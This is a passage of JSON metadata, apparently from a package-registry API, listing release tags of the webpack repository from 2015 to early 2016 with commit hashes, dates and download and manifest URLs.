","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"